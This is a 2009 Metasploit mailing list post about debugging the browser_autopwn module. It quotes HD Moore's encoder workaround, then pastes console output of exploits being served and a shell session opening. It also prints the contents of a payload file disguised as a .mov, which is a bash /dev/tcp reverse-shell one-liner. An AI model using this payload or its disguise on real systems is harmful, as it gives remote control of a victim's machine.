Metasploit mailing list archives
browser_autopwn
From: ricardo.teixas at gmail.com (Ricardo F. Teixeira)
Date: Mon, 17 Aug 2009 19:25:11 +0100
I worked around it for now by making the badchars list in the exploit '' and then adding a no-encoding fall through to the generic_sh.rb encoder, see if this solves the problem for you. -HD
[*] Request '/ads' from 192.168.1.254:63413 ... [*] Responding with exploits adding: HJUMl5rb.mov (deflated 13%) adding: __MACOSX/._HJUMl5rb.mov (deflated 87%) [*] Command shell session 1 opened (192.168.1.254:43828 -> 192.168.1.254:63415) Like someone says "It works like a charm!" Just one more thing, when opened the payload itself as a binary it says "Bad file descriptor" maggie:~ ricardo$ sh HJUMl5rb.mov HJUMl5rb.mov: line 1: 185: Bad file descriptor maggie:Downloads ricardo$ cat HJUMl5rb.mov 0<&185-;exec 185<>/dev/tcp/192.168.1.254/43828;sh <&185 >&185 2>&185 -- Ricardo F. Teixeira uid: 0x5BBD1456
Current thread:
- browser_autopwn Ricardo F. Teixeira (Aug 17)
- browser_autopwn HD Moore (Aug 17)
- Message not available
- browser_autopwn Ricardo F. Teixeira (Aug 17)
- Message not available
- browser_autopwn HD Moore (Aug 17)